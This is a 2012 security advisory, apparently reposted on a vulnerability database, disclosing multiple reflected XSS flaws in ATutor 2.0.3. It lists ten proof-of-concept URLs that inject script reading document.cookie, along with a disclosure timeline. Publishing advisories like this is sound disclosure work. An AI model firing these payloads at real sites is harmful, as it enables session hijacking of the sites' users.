ATutor 2.0.3 Cross Site Scripting

2012.01.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: ATutor 2.0.3 Multiple XSS vulnerabilities Advisory ID: SSCHADV2012-002 Author: Stefan Schurtz Affected Software: Successfully tested on ATutor 2.0.3 Vendor URL: http://atutor.ca Vendor Status: informed ========================== Vulnerability Description ========================== ATutor 2.0.3 is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script> http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php ========= Solution ========= - ==================== Disclosure Timeline ==================== 01-Jan-2012 - vendor informed 01-Jan-2012 - vendor feedback 15-Jan-2012 - no fix available ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://atutor.ca/view/3/22740/1.html http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt

References:

http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top